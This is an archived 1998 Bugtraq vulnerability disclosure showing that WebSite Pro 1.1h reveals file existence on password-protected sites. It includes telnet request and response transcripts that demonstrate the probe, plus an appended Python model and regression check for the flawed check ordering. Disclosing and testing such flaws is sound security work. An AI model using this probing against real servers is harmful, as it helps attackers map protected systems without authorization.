Bugtraq archives for 2nd quarter (Apr-Jun) 1998: Flaw in HTTP-Authentication in O'Reilly Website Pro

Flaw in HTTP-Authentication in O'Reilly Website Pro

BarKode (bkarena.cwnet.com)
Fri, 24 Apr 1998 03:14:02 +0000

Greetings...

        I went to download a file I'd stashed away on a machine at work
running Website Pro 1.1h, with HTTP-Authentication required to
access the site at all.  I mistyped the name and to my astonishment
got a 404 error. This only surprised me because I had just started
the browser, and had not yet been prompted for a username and
password (Authentication-basic style).

Problem: You can remotely check for existence of files and
directory structures on a machine running Web Site Pro 1.1.

Observe: Here we will try to access index.html, a file which exists on
the protected host.
thunder:~$ telnet protected.host.com 80
Trying 1.2.3.4...
Connected to protected.host.com.
Escape character is '^]'.
GET / HTTP/1.0

HTTP/1.0 401 Unauthorized
Date: Fri, 24 Apr 1998 09:33:46 GMT
Server: WebSitePro/1.1h
Accept-ranges: bytes
WWW-Authenticate: Basic realm="Web Server"
Content-length: 156

Authorization Required

Authorization Required

Authentication (Basic) failed or was missing.
Connection closed by foreign host.

******
Now we try to access a file that does *not* exist.

thunder:~$ telnet protected.host.com 80
Trying 1.2.3.4...
Connected to protected.host.com.
Escape character is '^]'.
GET /nothere.html HTTP/1.0

HTTP/1.0 404 Not Found
Date: Fri, 24 Apr 1998 09:35:42 GMT
Server: WebSitePro/1.1h
Accept-ranges: bytes
Content-type: text/html
Content-length: 207

404 Not Found

404 Not Found

The requested URL was not found on this server:

/nothere.html

(C:/WebSite/htdocs/nothere.html)

Connection closed by foreign host.

*****
No mention whatsoever of Authentication, the server spewed forth a 404
document, gleefully stating the file we want isn't there. The same
situation posed under Apache 1.2.5 returns a '401 Unauthorized' in
either situation.

Contacted O'Reilly, awaiting response....

-Matt
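
Added example (not part of the original post, and not WebSite Pro's or Apache's code): a minimal Python model of two check orderings that reproduce the responses shown above, with a regression check that flags a handler whose unauthenticated status depends on whether the path exists. The document root, account and all function names are constructed for illustration.

```python
import base64
import hmac

# Constructed sample data: a tiny in-memory document root and one account.
DOCROOT = {"/index.html": b"<html>protected</html>"}
USERS = {"alice": "s3cret"}
CHALLENGE = {"WWW-Authenticate": 'Basic realm="Web Server"'}

def authorized(headers):
    """True only if the request carries valid HTTP Basic credentials."""
    scheme, _, blob = headers.get("Authorization", "").partition(" ")
    if scheme.lower() != "basic":
        return False
    try:
        user, _, pw = base64.b64decode(blob, validate=True).decode().partition(":")
    except ValueError:  # bad base64 or non-UTF-8 bytes
        return False
    expected = USERS.get(user)
    return expected is not None and hmac.compare_digest(expected.encode(), pw.encode())

def lookup_first(path, headers):
    """Resolves the path before checking credentials: matches the 404/401 split in the post."""
    if path not in DOCROOT:
        return 404, {}
    if not authorized(headers):
        return 401, dict(CHALLENGE)
    return 200, {}

def auth_first(path, headers):
    """Checks credentials before touching the path: the behaviour reported for Apache 1.2.5."""
    if not authorized(headers):
        return 401, dict(CHALLENGE)
    if path not in DOCROOT:
        return 404, {}
    return 200, {}

def leaks_existence(handler, present="/index.html", absent="/nothere.html"):
    """Regression check: without credentials, the status must not vary with path existence."""
    return handler(present, {})[0] != handler(absent, {})[0]

if __name__ == "__main__":
    for h in (lookup_first, auth_first):
        print(h.__name__, "leaks existence:", leaks_existence(h))
```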